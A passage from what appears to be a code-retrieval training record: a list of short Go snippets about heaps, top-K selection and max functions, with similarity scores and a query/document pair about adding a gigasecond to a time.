*testing.T) {\n var cases = []struct {\n input []int\n k int\n output []int\n }{\n {\n input: []int{1,1,1,2,2,3},\n k: 2,\n output: []int{1,2},\n },\n {\n input: []int{1},\n k: 1,\n output: []int{1},\n },\n }\n for _, c := range cases {\n x := topKFrequent(c.input, c.k)\n if !reflect.DeepEqual(x, c.output) {\n t.Fail()\n }\n }\n}", "func topKFrequent(nums []int, topK int) []int {\n\t// Count using a map.\n\tm := make(map[int]int)\n\tfor _, v := range nums {\n\t\tm[v] += 1\n\t}\n\n\t// Push count-value pairs into a heap, keep top K.\n\thp := &vcPairMinHeap{}\n\theap.Init(hp)\n\tfor k, v := range m {\n\t\tp := vcPair{value: k, count: v}\n\t\theap.Push(hp, p)\n\t\tif hp.Len() > topK {\n\t\t\theap.Pop(hp)\n\t\t}\n\t}\n\n\t// Create answer from the heap reversely.\n\tans := make([]int, topK)\n\tfor k := topK - 1; k >= 0; k-- {\n\t\tans[k] = heap.Pop(hp).(vcPair).value\n\t}\n\treturn ans\n}", "func TestIHMaxAddOrder1(t *testing.T) {\n\th := NewImplicitHeapMax(false)\n\n\th.Push(1, 1)\n\th.Push(3, 3)\n\th.Push(4, 4)\n\n\ttestIMPriorityOrder(h.a, []int{4, 1, 3}, \"push 1\", t)\n\n\th.Push(2, 2)\n\ttestIMPriorityOrder(h.a, []int{4, 2, 3, 1}, \"push 2\", t)\n\n\th.Push(5, 5)\n\ttestIMPriorityOrder(h.a, []int{5, 4, 3, 1, 2}, \"push 3\", t)\n}", "func TopK(nums []int, k int) []int {\n\tl := len(nums)\n\tfmt.Println(\"start: \", nums)\n\n\tquickSort(nums, 0, l-1, k)\n\tfmt.Println(\"end: \", nums)\n\n\treturn nums[:k]\n}", "func Constructor(k int) MyCircularQueue {\n return MyCircularQueue{vals: make([]int, k), head: 0, tail: 0, n: k, l: 0 }\n}", "func main() {\n\tfmt.Println(getKthFromEnd(&ListNode{\n\t\tVal: 1,\n\t\tNext: &ListNode{\n\t\t\tVal: 2,\n\t\t\tNext: &ListNode{\n\t\t\t\tVal: 3,\n\t\t\t\tNext: &ListNode{\n\t\t\t\t\tVal: 4,\n\t\t\t\t\tNext: &ListNode{\n\t\t\t\t\t\tVal: 5,\n\t\t\t\t\t\tNext: nil,\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t}, 2))\n}", "func BuildMax(in []int) Heap {\n\th := Heap(in)\n\n\tpos := len(in) / 2\n\tfor pos > 0 {\n\t\th.MaxHeapifyDown(pos)\n\t}\n\n\treturn nil\n}", "func main() {\n obj := Constructor();\n obj.Push(2147483646)\n obj.Push(2147483646)\n obj.Push(2147483647)\n //obj.Pop()\n fmt.Println(obj.Top())\n obj.Pop()\n obj.GetMin()\n\n obj.Pop()\n obj.GetMin()\n\n obj.Pop()\n obj.Push(2147483647)\n fmt.Println(obj.Top())\n obj.GetMin()\n\n obj.Push(-2147483648)\n fmt.Println(obj.Top())\n obj.GetMin()\n obj.Pop()\n obj.GetMin()\n}", "func New(k int) *Tree {\n\tvar t *Tree\n\tfor _, v := range rand.Perm(10) {\n\t\tt = insert(t, (1+v)*k)\n\t}\n\treturn t\n}", "func New(k int) *Tree {\n\tvar t *Tree\n\tfor _, v := range rand.Perm(10) {\n\t\tt = insert(t, (1+v)*k)\n\t}\n\treturn t\n}", "func PushMaxHeap(h *MaxHeap, x int) {\n heap.Push(h, x)\n}", "func MaxHailstoneValue(n int) int {\n var max int = n\n for n > 1 {\n var temp int = h(n)\n if temp > max {\n max = temp\n }\n n = temp\n }\n return max\n}", "func main() {\n\tnums1 := []int{1, 7, 11}\n\t// nums1 := []int{3, 5, 7, 9}\n\n\t// nums2 := []int{}\n\t// nums2 := []int{2, 4, 6}\n\tnums2 := []int{2, 4, 9}\n\tk := 3\n\t// k := 1\n\n\tfmt.Println(kSmallestPairs(nums1, nums2, k))\n}", "func main() {\n c := Constructor(2)\n fmt.Println(c.Next(1))\n fmt.Println(c.Next(2))\n }", "func kthSmallest(root *TreeNode, k int) int {\n\tif root == nil {\n\t\treturn -1\n\t}\n\n\tarr := make([]int, 0)\n\tinorder230(root, &arr, k)\n\treturn arr[k-1]\n}", "func kthNumber(nums []int, k int) (int, error) {\n\tif k < 0 || k >= len(nums) {\n\t\treturn -1, search.ErrNotFound\n\t}\n\tstart := 0\n\tend := len(nums) - 1\n\tfor start <= end {\n\t\tpivot := sort.Partition(nums, start, end)\n\t\tif k == pivot {\n\t\t\treturn nums[pivot], nil\n\t\t}\n\t\tif k > pivot {\n\t\t\tstart = pivot + 1\n\t\t\tcontinue\n\t\t}\n\t\tend = pivot - 1\n\t}\n\treturn -1, search.ErrNotFound\n}", "func (this Worker) TopN() int {\n t, e := this.manager.Conf().Int(this.self.Kind(), \"topN\")\n if e == nil {\n return t\n }\n\n return 0\n}", "func Constructor(size int) MovingAverage {\n return MovingAverage{\n queue: []int{},\n size: size,\n sum: 0,\n }\n}", "func topKFrequent(nums []int, k int) []int {\n m := make(map[int]int)\n maxFre := 0\n for _, v := range nums {\n m[v] +=1\n maxFre = max(maxFre, m[v])\n }\n bucket := make(map[int][]int, maxFre)\n for k, v := range m {\n bucket[v] = append(bucket[v], k)\n }\n res := []int{}\n for i := maxFre; i >= 1; i-- {\n p, ok := bucket[i]\n if !ok {\n continue\n }\n res = append(res, p...)\n }\n return res[:k]\n}", "func Constructor(nums []int) Solution {\n\treturn Solution{rand.New(rand.NewSource(time.Now().UnixNano())), nums}\n}", "func MaxKey() Val { return Val{t: bsontype.MaxKey} }", "func Max[T constraints.Ordered](x T, y T) T {\n\tif x > y {\n\t\treturn x\n\t}\n\treturn y\n}", "func NewTopK(epsilon, delta float64, k uint) *TopK {\n\telements := make(elementHeap, 0, k)\n\theap.Init(&elements)\n\treturn &TopK{\n\t\tcms: NewCountMinSketch(epsilon, delta),\n\t\tk: k,\n\t\telements: &elements,\n\t}\n}", "func New(n, k int) *Tree {\n\tvar t *Tree\n\tfor _, v := range rand.Perm(n) {\n\t\tt = insert(t, (1+v)*k)\n\t}\n\treturn t\n}", "func Max(a int, b int) int {\n if (b > a) {\n return b;\n }\n\n return a;\n}", "func Constructor(k int) MyCircularQueue {\n return MyCircularQueue{Size: k, Items: make([]int, k), HeadIndex: -1, TailIndex: -1}\n}", "func NewWithCapacity(requested int) (h *MaxHeap) {\n\tpower := 1\n\tfor power < requested {\n\t\tpower *= 2\n\t\tif power < 0 {\n\t\t\t// looks like we wrapped\n\t\t\tpower = mmmdatastructures.MaxInt\n\t\t\tbreak\n\t\t}\n\t}\n\th = new(MaxHeap)\n\th.data = make([]string, power, power)\n\th.capacity = power\n\th.size = 0\n\treturn h\n}", "func Max[T Number](items []T) T {\n\tvar max T\n\tif len(items) > 0 {\n\t\tmax = items[0]\n\t}\n\tfor _, item := range items[1:] {\n\t\tif item > max {\n\t\t\tmax = item\n\t\t}\n\t}\n\treturn max\n}", "func topKFrequent(nums []int, k int) []int {\n\ttmp, temp, res := make(map[int]int), [][]int{}, []int{}\n\tfor _, v := range nums {\n\t\ttmp[v]++\n\t}\n\tfor i, v := range tmp {\n\t\ttemp = append(temp, []int{i, v})\n\t}\n\tsort.Slice(temp, func(a, b int) bool { return temp[a][1] > temp[b][1] })\n\tfor i := 0; i < k; i++ {\n\t\tres = append(res, temp[i][0])\n\t}\n\treturn res\n}", "func main() {\n\ta := Constructor()\n\ta.Push(-2)\n\ta.Push(0)\n\ta.Push(-3)\n\tfmt.Println(a.GetMin())\n\ta.Pop()\n\tfmt.Println(a.Top())\n\tfmt.Println(a.GetMin())\n\t//minStack.push(0);\n\t//minStack.push(-3);\n\t//minStack.getMin(); --> 返回 -3.\n\t//minStack.pop();\n\t//minStack.top(); --> 返回 0.\n\t//minStack.getMin();\n}", "func main() {\n\tobj := Constructor()\n\tobj.Push(10)\n\tprintln(obj.Top())\n\tprintln(obj.Pop())\n\tprintln(obj.Empty())\n}", "func max[T constraints.Ordered](values ...T) T {\n\tvar acc T = values[0]\n\n\tfor _, v := range values {\n\t\tif v > acc {\n\t\t\tacc = v\n\t\t}\n\t}\n\treturn acc\n}", "func maximumToys(prices []int32, k int32) int32 {\n\tvar spendCounter int32\n\n\tsort.Slice(prices, func(i, j int) bool {\n\t\treturn prices[i] < prices[j]\n\t})\n\n\tfmt.Println(prices)\n\tfor j := 0; j < len(prices); j++ {\n\t\tif k-prices[j] > 0 {\n\t\t\tk -= prices[j]\n\t\t\tspendCounter++\n\t\t}\n\t}\n\n\treturn spendCounter\n}", "func findBiggest(numbers ...int) int {\n\tvar biggest int\n\t//iterate over numbers\n\tfor _, v := range numbers {\n\t\tif v > biggest {\n\t\t\tbiggest = v\n\t\t}\n\t}\n\n\treturn biggest\n}", "func Constructor() MedianFinder {\n\n}", "func main() {\n\tmaxWeight := []int {415, 5, 210, 435, 120, 75}\n\n\tfor _, v := range maxWeight {\n\t\tquiver(knapsack(len(boards) - 1, v))\n\t\tfmt.Printf(\"(%s %v)\\n\\n\\n===\\n\\n\", \"maximum weight\", v)\n\t}\n}", "func TestLargestPerKey(t *testing.T) {\n\tp, s := beam.NewPipelineWithRoot()\n\tcolZero := beam.Create(s, 1, 11, 7, 5, 10)\n\tkeyedZero := addKey(s, colZero, 0)\n\n\tcolOne := beam.Create(s, 2, 12, 8, 6, 11)\n\tkeyedOne := addKey(s, colOne, 1)\n\n\tcol := beam.Flatten(s, keyedZero, keyedOne)\n\ttop := LargestPerKey(s, col, 2, lessInt)\n\tout := beam.DropKey(s, top)\n\tpassert.Equals(s, out, []int{11, 10}, []int{12, 11})\n\tif err := ptest.Run(p); err != nil {\n\t\tt.Errorf(\"pipeline failed but should have succeeded, got %v\", err)\n\t}\n}", "func (*Number) NKeys() int { return 2 }", "func main() {\n\tobj := Constructor()\n\tfmt.Println(obj.Sum(\"aab\"))\n\tobj.Insert(\"aab\", 33)\n\tfmt.Println(obj.Sum(\"aab\"))\n\tfmt.Println(obj.Sum(\"ab\"))\n}", "func newNode(k collection.Comparer, v interface{}, h int) *node {\n\tn := &node{K: k, V: v, H: h, C: make([]*node, 2)}\n\treturn n\n}", "func (h *BSTHandler) KSmallestTraversal() {\n\n}", "func Constructor(k int) MyCircularDeque {\n return MyCircularDeque {\n head : 0,\n tail : 0,\n capacity : k + 1,\n data : make([]int, k + 1),\n }\n}", "func (a Slice[T]) Max(block func(T) int) T {\n\tif len(a) == 0 {\n\t\treturn *new(T)\n\t}\n\tvar maxElement T = a[0]\n\tvar maxScore = block(a[0])\n\tfor _, o := range a[1:] {\n\t\tscore := block(o)\n\t\tif score > maxScore {\n\t\t\tmaxElement = o\n\t\t\tmaxScore = score\n\t\t}\n\t}\n\n\treturn maxElement\n}", "func (h *Heap) MaxHeap() {\n for i := h.num_nodes; i >= 0; i-- {\n if h.data[i] < h.data[i * 2 + 1] {\n swap(h.data, i, i * 2 + 1)\n }else if len(h.data) > i * 2 + 2 && h.data[i] < h.data[i * 2 + 2] {\n swap(h.data, i, i * 2 + 2)\n }\n }\n\n if !h.MaxHeapTest() {\n h.MaxHeap()\n }\n}", "func main() {\n\t//node6 := &PartitionListNode{Val:2}\n\t//node5 := &PartitionListNode{Next:node6, Val:5}\n\t//node4 := &PartitionListNode{Next:node5, Val:2}\n\t//node3 := &PartitionListNode{Next:node4, Val:3}\n\t//node2 := &PartitionListNode{Next:node3, Val:4}\n\t//node1 := &PartitionListNode{Next:node2, Val:1}\n\t//newHead := partition(node1, 3)\n\t//fmt.Println(newHead.Val)\n\n\t//node91 := &PartitionListNode{Val:3}\n\t//node81 := &PartitionListNode{Next:node91, Val:0}\n\t//node71 := &PartitionListNode{Next:node81, Val:4}\n\t//node61 := &PartitionListNode{Next:node71, Val:1}\n\t//node51 := &PartitionListNode{Next:node61, Val:3}\n\t//node41 := &PartitionListNode{Next:node51, Val:1}\n\t//node31 := &PartitionListNode{Next:node41, Val:4}\n\t//node21 := &PartitionListNode{Next:node31, Val:0}\n\t//node11 := &PartitionListNode{Next:node21, Val:2}\n\t//newHead1 := partition(node11, 4)\n\t//fmt.Println(newHead1.Val)\n\n\tnode22 := &PartitionListNode{Val:1}\n\tnode12 := &PartitionListNode{Next:node22, Val:1}\n\tnewHead2 := partition(node12, 0)\n\tfmt.Println(newHead2.Val)\n}", "func main() {\n\tobj := Constructor()\n\tparam := obj.Book(3, 5)\n\tparam = obj.Book(1, 4)\n\tfmt.Println(param)\n}", "func smallestDistancePair(nums []int, k int) int {\n \n}", "func main() {\n\t// Here inside main() we will first create a list of 10\n\t// elements from 1 .. 10\n\tl := list.New()\n\tfmt.Println(\"Setting up the list.\")\n\tfor i := 1; i <= 10; i++ {\n\t\tj := i * 72\n\t\tfmt.Println(\"Adding the \", i, \"th element to the list.\")\n\t\tl.PushBack(j)\n\t\tfmt.Println(\"The element is: \", l.Back())\n\t}\n\t// There are the 10 elements, lets print the result\n\t// I presume the notation is telling me the memory addresses\n\t// of the beginning->end and the number of elements.\n\tfmt.Println(\"Here is the list: \", l)\n\t// Now make last_element from the result of find_last()\n\tfmt.Println(\"find_last takes an element of the list, and two copies of the wrapper object.\")\n\tfmt.Println(\"In the body of find_last, we will update the wrappers to maintain some interesting state information.\")\n\tlast_element := find_last(l.Front(), &wrapper_obj{0,0,l.Front()}, &wrapper_obj{0,0,l.Front()})\n\t// Once find_last returns an element, lets take it apart and extract the value.\n\tlast_value := last_element.Value.(int)\n\t// And print that value to the user\n\tfmt.Println(\"The answer is: \", last_value)\n}", "func main() {\n\tfmt.Println(genNumTreesDP(5))\n}", "func PMAXUB(mx, x operand.Op) { ctx.PMAXUB(mx, x) }", "func initHeap()", "func max(a, b int) int {\nif a < b {\nreturn b\n}\nreturn a\n}", "func max(num1, num2 int) int {\n /* local variable declaration */\n var result int\n\n if (num1 > num2) {\n result = num1\n } else {\n result = num2\n }\n return result \n}", "func findgreatestnum(nums ...int) int {\n\tfmt.Printf(\"%T\\n\", nums)\n\tvar max int\n\tfor _, i := range nums {\n\t\tif max < i {\n\t\t\tmax = i\n\t\t}\n\t}\n\treturn max\n}", "func Max(l []int) (max int) {\n\tmax = l[0]\n\tfor _, v := range l {\n\t\tif v > max {\n\t\t\tmax = v\n\t\t}\n\t}\n\t// As we use a named return parameter\n\t// the result max is now returned!\n\treturn\n}", "func main() {\n\tobj := Constructor()\n\tobj.Add(1)\n\tobj.Add(2)\n\tobj.Add(2)\n\tfmt.Printf(\"%+v\", obj)\n\tobj.Remove(2)\n}", "func Max(x, y int64) int64 {\n if x > y {\n return x\n }\n return y\n}", "func Max(x, y int) int {\n if x < y {\n return y\n }\n return x\n}", "func (h *heap) buildMaxHeap() {\n\tfor i := parent(h.size - 1); i >= 0; i-- {\n\t\th.maxHeapify(i)\n\t}\n}", "func (bh* BinomialHeap) Size() int {\n return bh.size\n}", "func Constructor0384(nums []int) Solution {\n\treturn Solution{\n\t\tnums: nums,\n\t}\n}", "func (s *GoSort) FindMaxElementAndIndex() (interface{},int) {\n var index = 0\n \n for i := 1; i < s.Len(); i++ {\n if s.GreaterThan(i, index) {\n index = i\n }\n }\n return s.values[index], index\n}", "func Max(numbers ...cty.Value) (cty.Value, error) {\n\treturn MaxFunc.Call(numbers)\n}", "func newPriorityQueue(width, height int) *priorityQueue {\n\tqueue := make([]*cheapestKnown, width*height)\n\n\ti := 0\n\tfor x := 0; x < width; x++ {\n\t\tfor y := 0; y < height; y++ {\n\t\t\tqueue[i] = &cheapestKnown{\n\t\t\t\tcost: math.MaxInt,\n\t\t\t\tpoint: Point2D{X: x, Y: y},\n\t\t\t}\n\n\t\t\ti++\n\t\t}\n\t}\n\n\treturn &priorityQueue{queue: queue}\n}" ]
[ "0.68705994", "0.5936624", "0.5897099", "0.58373976", "0.5735787", "0.5687011", "0.5647957", "0.55208284", "0.5458464", "0.5372213", "0.5371416", "0.5321578", "0.5310426", "0.5263591", "0.5253384", "0.52368516", "0.52337337", "0.51977116", "0.51825726", "0.5176275", "0.51683587", "0.51623946", "0.51361066", "0.5122872", "0.51211596", "0.50867474", "0.50478464", "0.4986943", "0.4962418", "0.49278167", "0.4924447", "0.48924336", "0.4876678", "0.48722497", "0.48705572", "0.48703024", "0.48610786", "0.4859972", "0.48564684", "0.48540986", "0.48355618", "0.48214206", "0.47954944", "0.47760102", "0.47746623", "0.47746623", "0.4771931", "0.47109625", "0.4704111", "0.46929267", "0.4689179", "0.4674733", "0.4672846", "0.4659092", "0.4655677", "0.46464118", "0.46405664", "0.46345532", "0.46135187", "0.46023405", "0.45918262", "0.45857096", "0.45686662", "0.45667863", "0.4552789", "0.4552117", "0.45254126", "0.45220837", "0.45168614", "0.45102325", "0.45056745", "0.45021144", "0.44950038", "0.44920543", "0.449023", "0.44899264", "0.4476835", "0.44678706", "0.44545448", "0.44540852", "0.44345275", "0.44235212", "0.4422308", "0.44129106", "0.44078818", "0.44071102", "0.44042367", "0.44036448", "0.43792713", "0.43770292", "0.43699062", "0.43654478", "0.4363293", "0.43573493", "0.4352327", "0.43495494", "0.43441468", "0.43325463", "0.43244216", "0.43239143" ]
0.693237
0
AddGigasecond returns a time (10^9 seconds) past the given time.
func AddGigasecond(t time.Time) time.Time { gigasecond := time.Duration(1000000000) * time.Second return t.Add(gigasecond) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func AddGigasecond(t time.Time) time.Time {\n\treturn t.Add(time.Duration(time.Duration(math.Pow(10, 9)) * time.Second))\n}", "func AddGigasecond(t time.Time) time.Time {\n\tvar result time.Time\n\tseconds := t.Unix()\n\tseconds += 1000000000\n\tresult = time.Unix(seconds, 0)\n\treturn result\n}", "func AddGigasecond(input time.Time) time.Time {\n return input.Add( time.Second * 1e9 )\n}", "func AddGigasecond(t time.Time) time.Time {\n\treturn t.Add(time.Duration(math.Pow10(9)) * time.Second)\n}", "func AddGigasecond(t time.Time) time.Time {\n\treturn t.Add(1e9 * time.Second)\n}", "func AddGigasecond(t time.Time) time.Time {\n\treturn t.Add(1e9 * time.Second)\n}", "func AddGigasecond(t time.Time) time.Time {\n\treturn t.Add(time.Second * 1e9)\n}", "func AddGigasecond(t time.Time) time.Time {\n\treturn t.Add(time.Second * 1e9)\n}", "func AddGigasecond(t time.Time) time.Time {\n\treturn t.Add(time.Second * 1000000000)\n}", "func AddGigasecond(t time.Time) time.Time {\n\treturn t.Add(time.Second * 1000000000)\n}", "func AddGigasecond(t time.Time) time.Time {\n\treturn t.Add(time.Second * 1000000000)\n}", "func AddGigasecond(t time.Time) time.Time {\n\treturn t.Add(time.Second * 1000000000)\n}", "func AddGigasecond(t time.Time) time.Time {\n\treturn t.Add(1000000000 * time.Second)\n}", "func AddGigasecond(t time.Time) time.Time {\n\tt = t.Add(time.Duration(1000000000*1000000000))\n\treturn t\n}", "func AddGigasecond(t time.Time) time.Time {\n\tval := time.Second * 1000000000\n\treturn t.Add(time.Duration(val))\n}", "func AddGigasecond(t time.Time) time.Time {\n\n\ttt, _ := time.Parse(\"2006-01-02T15:04:05\", t.Add(giga*time.Second).Format(fmtDT))\n\treturn tt\n}", "func AddGigasecond(t time.Time) time.Time {\r\n\treturn t.Add(Gigasecond)\r\n}", "func AddGigasecond(t time.Time) time.Time {\n\tduration := time.Duration(1000000000) * time.Second\n\treturn t.Add(duration)\n}", "func AddGigasecond(t time.Time) time.Time {\n\tt = t.Add(time.Second * gigasecond)\n\treturn t\n}", "func AddGigasecond(t time.Time) time.Time {\n\t// a gigasecond is 1,000,000,000 seconds\n\t// so first we make a duration that represents it\n\tgs := (time.Duration(1000000000) * time.Second)\n\n\t// then we can simply add it to the time passed in\n\t// with time's Add() method\n\treturn t.Add(gs)\n}", "func AddGigasecond(t time.Time) time.Time {\n\tt = t.Add(time.Duration(gigasecond))\n\treturn t\n}", "func AddGigasecond(in time.Time) time.Time {\n\treturn in.Add(Gigasecond * time.Second)\n}", "func AddGigasecond(t time.Time) time.Time {\n\treturn t.Add(Gigasecond)\n}", "func AddGigasecond(t time.Time) time.Time {\n\treturn t.Add(gigasecond)\n}", "func AddGigasecond(t time.Time) time.Time {\n\treturn t.Add(gigasecond)\n}", "func AddGigasecond(t time.Time) time.Time {\n\tduration, _ := time.ParseDuration(fmt.Sprintf(\"%1.fs\", 1e9))\n\treturn t.Add(duration)\n}", "func AddGigasecond(t time.Time) time.Time {\n\tgs, _ := time.ParseDuration(gigasecond)\n\tt2 := t.Add(gs)\n\treturn t2\n}", "func AddGigasecond(t time.Time) time.Time {\n\n\treturn t.Add(GIGASECOND)\n}", "func AddGigasecond(t time.Time) time.Time {\n\treturn t.Add(GIGASECOND)\n}", "func AddGigasecond(myDate time.Time) time.Time {\n\treturn myDate.Add(time.Duration(math.Pow10(18)))\n}", "func AddGigasecond(now time.Time) time.Time {\n\treturn now.Add(GIGASECOND)\n}", "func ExampleTime_Add() {\n\tgt := gtime.New(\"2018-08-08 08:08:08\")\n\tgt1 := gt.Add(time.Duration(10) * time.Second)\n\n\tfmt.Println(gt1)\n\n\t// Output:\n\t// 2018-08-08 08:08:18\n}", "func (s *Sample) AddTime(t time.Duration) *Sample {\n\ts.Times = append(s.Times, t)\n\tatomic.AddInt64(&s.Count, 1)\n\n\treturn s\n}", "func (t GpsTime) Add(d time.Duration) GpsTime {\n\treturn Gps(t.Gps() + d)\n}", "func (t Time) TimeSinceGPSEpoch() time.Duration {\n\tvar offset time.Duration\n\tfor _, ls := range leapSecondsTable {\n\t\tif ls.Time.Before(time.Time(t)) {\n\t\t\toffset += ls.Duration\n\t\t}\n\t}\n\n\treturn time.Time(t).Sub(gpsEpochTime) + offset\n}", "func ExampleTime_Round() {\n\tgt := gtime.New(\"2018-08-08 08:08:08\")\n\tt := gt.Round(time.Duration(10) * time.Second)\n\n\tfmt.Println(t)\n\n\t// Output:\n\t// 2018-08-08 08:08:10\n}", "func (at *Time) Add(n time.Time) time.Time {\n\treturn time.Unix(0, at.v.Add(n.UnixNano()))\n}", "func (s MeshService) GenesisTime(ctx context.Context, in *pb.GenesisTimeRequest) (*pb.GenesisTimeResponse, error) {\n\tlog.Info(\"GRPC MeshService.GenesisTime\")\n\treturn &pb.GenesisTimeResponse{Unixtime: &pb.SimpleInt{\n\t\tValue: uint64(s.GenTime.GetGenesisTime().Unix()),\n\t}}, nil\n}", "func AddSec(t time.Time, seconds int) time.Time {\n\treturn t.Add(time.Duration(seconds) * time.Second)\n}", "func AddtimeAppointGT(v time.Time) predicate.AppointmentResults {\n\treturn predicate.AppointmentResults(func(s *sql.Selector) {\n\t\ts.Where(sql.GT(s.C(FieldAddtimeAppoint), v))\n\t})\n}", "func NowAddSec(seconds int) time.Time {\n\treturn time.Now().Add(time.Duration(seconds) * time.Second)\n}", "func (gdb *Gdb) getTimeDuration(duration int) int64 {\n\treturn time.Now().Add(time.Duration(duration)*time.Second).Unix() + 8*3600\n}", "func getTime() time.Time {\n\treturn time.Now().Add(timeOffset)\n}", "func Gps(offset time.Duration) GpsTime {\n\treturn GpsTime(toUtcTime(offset))\n}", "func (dt *DateTime) Gt(value time.Time) *DateTime {\n\topChain := dt.chain.enter(\"Gt()\")\n\tdefer opChain.leave()\n\n\tif opChain.failed() {\n\t\treturn dt\n\t}\n\n\tif !dt.value.After(value) {\n\t\topChain.fail(AssertionFailure{\n\t\t\tType: AssertGt,\n\t\t\tActual: &AssertionValue{dt.value},\n\t\t\tExpected: &AssertionValue{value},\n\t\t\tErrors: []error{\n\t\t\t\terrors.New(\"expected: time point is after given time\"),\n\t\t\t},\n\t\t})\n\t}\n\n\treturn dt\n}", "func (this *FieldsDef) AddTime(name string) *FieldDef {\n\treturn this.AddField(name, sqldef.DT_TIME, 0, 0)\n}", "func NewGTime() GTime {\n\treturn GTime{From: \"now-24h\", To: \"now\"}\n}", "func GenTime(t uint64) GenOption {\n\treturn func(gc *GenesisCfg) error {\n\t\tgc.Time = t\n\t\treturn nil\n\t}\n}", "func Time(t time.Time) Val {\n\treturn Val{t: bsontype.DateTime}.writei64(t.Unix()*1e3 + int64(t.Nanosecond()/1e6))\n}", "func (dec *Decoder) AddTime(v *time.Time, format string) error {\n\treturn dec.Time(v, format)\n}", "func IntTime() int {\n\treturn int(time.Now().Unix())\n}", "func AddedTimeGTE(v time.Time) predicate.Rent {\n\treturn predicate.Rent(func(s *sql.Selector) {\n\t\ts.Where(sql.GTE(s.C(FieldAddedTime), v))\n\t})\n}", "func (t UnixTime) Add(d time.Duration) UnixTime {\n\treturn t + UnixTime(d/time.Second)\n}", "func (t UnixTime) Add(d time.Duration) UnixTime {\n\treturn t + UnixTime(d/time.Second)\n}", "func AddtimeSaveGT(v time.Time) predicate.AppointmentResults {\n\treturn predicate.AppointmentResults(func(s *sql.Selector) {\n\t\ts.Where(sql.GT(s.C(FieldAddtimeSave), v))\n\t})\n}", "func new_time() time.Duration {\n\treturn time.Duration((rand.Intn(300) + 150)) * time.Millisecond\n}", "func (t GpsTime) Gps() time.Duration {\n\tvalue := toGpsTime(time.Time(t))\n\treturn time.Duration(value)\n}", "func Test_TimeAdd(t *testing.T) {\n\ttimeAdd()\n}", "func NowAddHour(hour int) time.Time {\n\treturn time.Now().Add(time.Duration(hour) * OneHour)\n}", "func (m *BillMutation) AddTime(i int) {\n\tif m.addtime != nil {\n\t\t*m.addtime += i\n\t} else {\n\t\tm.addtime = &i\n\t}\n}", "func (c *context) WgAdd(delta int) {\n\tc.waitGroup.Add(delta)\n}", "func AddedTimeGT(v time.Time) predicate.Rent {\n\treturn predicate.Rent(func(s *sql.Selector) {\n\t\ts.Where(sql.GT(s.C(FieldAddedTime), v))\n\t})\n}", "func (c Clock) Add(minutes int) Clock {\n\treturn Time(0, int(c)+minutes)\n}", "func (id GID) Time() time.Time {\n\t// First 4 bytes of GID is 32-bit big-endian seconds from epoch.\n\tsecs := int64(binary.BigEndian.Uint32(id.slice(0, 4)))\n\n\treturn time.Unix(secs, 0)\n}", "func addDelay(d time.Duration) time.Duration {\n\trand.Seed(time.Now().UnixNano())\n\n\tsec := int(math.Max(float64(d/time.Second), 1))\n\tsec = int(math.Min(float64(sec+rand.Intn(9))+1, 60)) // #nosec G404\n\n\treturn time.Duration(sec) * time.Second\n}", "func addDelay(d time.Duration) time.Duration {\n\trand.Seed(time.Now().UnixNano())\n\n\tsec := int(math.Max(float64(d/time.Second), 1))\n\tsec = int(math.Min(float64(sec+rand.Intn(9))+1, 60)) // #nosec G404\n\n\treturn time.Duration(sec) * time.Second\n}", "func (v *API) FinishTime() (time.Time, error) {\n\tres, err := v.apiG()\n\n\tif res, ok := res.(response); err == nil && ok {\n\t\tremaining := res.ResMsg.EvStatus.RemainTime2.Atc.Value\n\n\t\tif remaining == 0 {\n\t\t\treturn time.Time{}, api.ErrNotAvailable\n\t\t}\n\n\t\treturn res.timestamp.Add(time.Duration(remaining) * time.Minute), nil\n\t}\n\n\treturn time.Time{}, err\n}", "func (t Time) Nanosecond() int {}", "func AddSeconds(t time.Time, seconds int) time.Time {\n\treturn t.Add(time.Duration(seconds) * time.Second)\n}", "func NowAddSeconds(seconds int) time.Time {\n\treturn time.Now().Add(time.Duration(seconds) * time.Second)\n}", "func (si *Index) IncreaseGenerationTime(dur int64) {\n\t_ = atomic.AddInt64(&si.generationTime, dur)\n}", "func AddMinutes(t time.Time, minutes int) time.Time {\n\treturn t.Add(time.Duration(minutes) * OneMin)\n}", "func NewWithTime(t time.Time) GID {\n\tvar id [12]byte\n\n\t// Timestamp, 4 bytes, big endian\n\tbinary.BigEndian.PutUint32(id[:4], uint32(t.Unix()))\n\n\treturn GID(id[:])\n}", "func ExampleGpsTime() {\n\tfmt.Println(int64(gpstm.GpsTime(time.Date(2010, time.January, 28, 16, 36, 24, 0, time.UTC)).Gps() / time.Microsecond))\n\t// Output: 948731799000000\n}", "func dbToTime(t float64) time.Time {\n\tif t <= 0.0 {\n\t\tpanic(\"Don't expect negative time\")\n\t}\n\n\tsec := math.Trunc(t)\n\tnsec := (t - sec) * 1.0e9\n\n\treturn time.Unix(int64(sec), int64(nsec))\n}", "func (v *UtilBuilder) Add(t time.Time) (res time.Time, err error) {\n\tif v.Operation != ADDOPERATION {\n\t\terr = errors.New(\"Invalid Operation\")\n\t\tres = t\n\t} else {\n\t\tswitch v.Leap {\n\t\tcase HOURLEAP:\n\t\t\tres = addHour(t, v.Step)\n\t\tcase DAYLEAP:\n\t\t\tres = addDay(t, v.Step)\n\t\tcase WEEKLEAP:\n\t\t\tres = addWeek(t, v.Step)\n\t\tcase YEARLEAP:\n\t\t\tres = addYear(t, v.Step)\n\t\tdefault:\n\t\t\terr = errors.New(\"Undefined Operation\")\n\t\t\tres = t\n\t\t}\n\t}\n\treturn\n}", "func HighresTime() HighresTimestamp {\n\treturn HighresTimestamp(nanotime())\n}", "func ReplaceNanosecond(t time.Time, with int) time.Time {\n\treturn time.Date(t.Year(), t.Month(), t.Day(), t.Hour(), t.Minute(), t.Second(), with, t.Location())\n}", "func getTime(timeOffset int64) int64 {\n\tnow := time.Now()\n\treturn now.Unix() + timeOffset\n}", "func GenTime() string {\n\tcTime := time.Now()\n\tt := fmt.Sprint(cTime)\n\n\treturn t\n}", "func AddedTimeGTE(v time.Time) predicate.Medicalfile {\n\treturn predicate.Medicalfile(func(s *sql.Selector) {\n\t\ts.Where(sql.GTE(s.C(FieldAddedTime), v))\n\t})\n}", "func ExampleNewFromTime() {\n\ttimer, _ := time.Parse(\"2006-01-02 15:04:05\", \"2018-08-08 08:08:08\")\n\tnTime := gtime.NewFromTime(timer)\n\n\tfmt.Println(nTime)\n\n\t// Output:\n\t// 2018-08-08 08:08:08\n}", "func (t Time) Add(m int) Time {\n\treturn New(0, t.minutes+m)\n}", "func (nt Time) Add(d 